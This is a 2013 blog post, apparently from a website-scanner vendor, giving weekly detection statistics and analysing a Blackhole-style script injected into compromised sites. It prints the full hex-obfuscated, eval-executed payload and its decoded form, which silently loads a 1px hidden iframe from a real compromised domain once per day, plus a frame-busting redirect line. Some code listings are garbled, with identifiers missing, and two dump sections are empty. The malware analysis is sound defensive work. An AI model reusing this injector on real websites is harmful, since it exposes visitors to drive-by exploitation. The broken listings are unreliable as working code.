Sunday, July 21, 2013

Weekly web threats review

Weekly web threats review

This statistical overview of the web-based malware detected last week is compiled from the results of the Online Website Malware Scanner and from manual analysis.

Online Website Malware Scanner
Online Website Malware Scanner

Website scan report

After each scan job, the website is assigned a status.
Currently, we divide websites into the following categories:
The malware scan report provides an exact breakdown of the files and the reasons for each detection.
In simple terms, for websites in the Clean category, our automatic online website scanner did not identify any suspicious elements in the files it successfully retrieved and scanned.

At the time of writing, the weekly distribution of submitted unique domains is as follows:
  • Clean websites: 74.6% (5048)
  • Potentially Suspicious websites: 15.7% (1060)
  • Suspicious websites and Malicious websites: 7.9% (533)
  • Unreachable/Invalid input: 1.6% (122)

Threat level evaluation

So which threats are worth highlighting? The majority of the detected malware consists of variants of the Blackhole exploit kit. The resulting malicious action injects a hidden iframe once per day for each unique visitor.
The logic implemented in the code:
a: Test whether the cookie exists.
b: If the cookie doesn't exist, inject a hidden iframe pointing to XXX and set the cookie for the next 24 hours.

Malware analysis with example

Here is the threat dump of the website that redirected visitors' browsers to cooperjuriti.agr[.]br


  1. = window;
  2. aq = "0x";
  3. ff = String;
  4. ff = ff.fromCharCode;
  5. try {
  6.     document["body"] ^= ~1;
  7. } catch (d21vd12v) {
  8.     v = 123;
  9.     vzs = false;
  10.     try {
  11.         document;
  12.     } catch (q) {
  13.         vzs = 1;
  14.     }
  15.     if (!vzs) e = w["eval"];
  16.     if (1) {
  17.         f ="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5e,6b,71,6a,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5e,6b,71,6a,5b,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,5a,66,66,67,5c,69,61,6c,69,60,6b,60,25,58,5e,69,25,59,69,26,5a,63,60,62,25,67,5f,67,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5e,6b,71,6a,5b,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5e,6b,71,6a,5b,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,5e,6b,71,6a,5b,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5e,6b,71,6a,5b,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5e,6b,71,6a,5b,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62
,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"["split"](",");
  18.     }
  19.     w = f;
  20.     s = [];
  21.     for (= 2 - 2; - i + 1345 != 0; i += 1) {
  22.         j = i;
  23.         if ((031 == 0x19))
  24.             if (e) s = s + ff(e(aq + (w[j])) + 9);
  25.     }
  26.     fafa = e;
  27.     fafa(s)
  28. }


Simplified threat version


  1. <script>
  // Analysis harness from the article: it decodes the embedded payload and displays it.
  // NOTE(review): some identifiers appear to have been lost from this listing (the
  // assignment targets on lines 2-3 and the loop counter on line 4); the loop body still
  // reads them as f, s and i.
  // Line 2: the payload is a comma-separated list of hex values (shortened here with "..."),
  // split into an array.
  2. ="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5e,6b,71,6a,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32...,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"["split"](",");
  3. = "";
  // Line 4: for each index from 0 until it reaches 1345, the entry is read as a hex number,
  // 9 is added, and the result is converted to a character and appended to s.
  // eval() is used here only to turn the text "0x.." into a number; when re-running this on
  // a sample, parseInt(f[i], 16) yields the same value without evaluating sample-supplied text.
  4. for (= 2 - 2; -+ 1345 != 0; i += 1) { s = s + String.fromCharCode(eval("0x" + (f[i])) + 9); }
  // Line 5: the decoded text is shown with alert() rather than passed to eval as in the
  // full dump above (fafa(s)), so the payload is displayed, not executed.
  5. alert(s);
  6. </script>


The decoded malicious payload injects a hidden iframe and sets a cookie


  // Decoded payload, iframe injector (analysis comments added; sample text unchanged).
  // Builds an iframe element, points it at a remote page, styles it so that it occupies a
  // 1px x 1px borderless box, and attaches it to the page inside a freshly written <div>.
  // Observable markers in this sample: a script-created iframe with 1px width/height and an
  // off-site src, and a container element with id 'gtzsd'.
  1. function zzzfff() {
  2.     var gtzsd = document.createElement('iframe');
  // Remote page loaded in the frame (the redirect target named in the article).
  3.     gtzsd.src = 'http://cooperjuriti.agr.br/clik.php';
  // Absolute positioning, zero border and 1px dimensions at offset (1px, 1px): the frame
  // takes no visible space in the layout.
  4.     gtzsd.style.position = 'absolute';
  5.     gtzsd.style.border = '0';
  6.     gtzsd.style.height = '1px';
  7.     gtzsd.style.width = '1px';
  8.     gtzsd.style.left = '1px';
  9.     gtzsd.style.top = '1px';
  // Guard: inject only if no element with id 'gtzsd' exists yet, so the frame is added at
  // most once per page. The container <div> is emitted with document.write and the iframe
  // is appended to it.
  10.     if (!document.getElementById('gtzsd')) {
  11.         document.write('<div id=\'gtzsd\'></div>');
  12.         document.getElementById('gtzsd').appendChild(gtzsd);
  13.     }
  14. }
  // Decoded payload, cookie writer (analysis comments added; sample text unchanged).
  // Writes cookieName=escape(cookieValue) to document.cookie with an expiry nDays days from
  // now, and appends a path attribute when `path` is truthy.
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  // Loose comparisons: a null, undefined or 0 value for nDays falls back to 1 day.
  18.     if (nDays == null || nDays == 0) nDays = 1;
  // 3600000 ms * 24 = one day; the multiplication also coerces a string nDays (the caller
  // passes '1') to a number.
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  // The statement continues on the next listing line; the line number there is part of the
  // article's listing, not of the script.
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  // Decoded payload, cookie reader (analysis comments added; sample text unchanged).
  // Looks for "<name>=" in document.cookie and returns the unescaped text between it and the
  // next ";" (or the end of the cookie string); returns null when no match is found.
  23. function GetCookie(name) {
  // indexOf matches the first occurrence of "<name>=" anywhere in the cookie string, so a
  // cookie whose name merely ends with `name` would also match.
  24.     var start = document.cookie.indexOf(name + "=");
  // Offset of the first character of the value (just past the "=").
  25.     var len = start + name.length + 1;
  // !start is true only when start is 0, i.e. the cookie string begins with "<name>=";
  // in that case the substring comparison is equal, so for a string `name` this branch
  // does not appear to be reachable.
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  // No "<name>=" found at all.
  31.     if (start == -1) return null;
  32.     var end = document.cookie.indexOf(";", len);
  // Last cookie in the string: there is no trailing ";", so read to the end.
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  // Decoded payload, entry point (analysis comments added; sample text unchanged).
  // Implements the once-per-day gate described in the article: the iframe is injected only
  // when the marker cookie is absent, and the cookie is then set for one day.
  // The whole block is skipped when navigator.cookieEnabled is false, so in this sample a
  // browser with cookies disabled does not receive the iframe.
  36. if (navigator.cookieEnabled)
  37. {
  // Marker cookie 'visited_uq' with value 55 (loose comparison, so the stored string '55'
  // matches): already seen, do nothing.
  38.     if (GetCookie('visited_uq') == 55) {} else {
  // First visit in the window: set the marker for 1 day on path '/', then inject the frame.
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }


Similar cases with malware analysis and detection



Frame-busting pattern redirect

Another interesting detection by the website scanner was obfuscated code that used a frame-busting pattern to redirect website visitors to the URL specified in a previously injected hidden iframe.

The redirection body looked like this:
  // Frame-busting check: when this document is not the top-level window (top.location
  // differs from self.location, i.e. it is rendered inside a frame), the top window is
  // navigated to this document's own URL. Per the article, when this runs in a page loaded
  // through the injected hidden iframe, the visitor's whole tab is sent to the iframe's URL.
  1. if (top.location != self.location) top.location = self.location;


Full threat dump:


Suspicious decryption module

Finally, we detected a packed, suspicious JavaScript decoder. There is a high probability that it is used to hide malicious activity.

Threat dump and analysis here: 

Malware clean-up


Such malware and other threats are often hidden inside JavaScript files. If you suspect that your website has been infected by similar malware, please use Website Anti-malware Monitoring for scheduled scans and remediation assessment.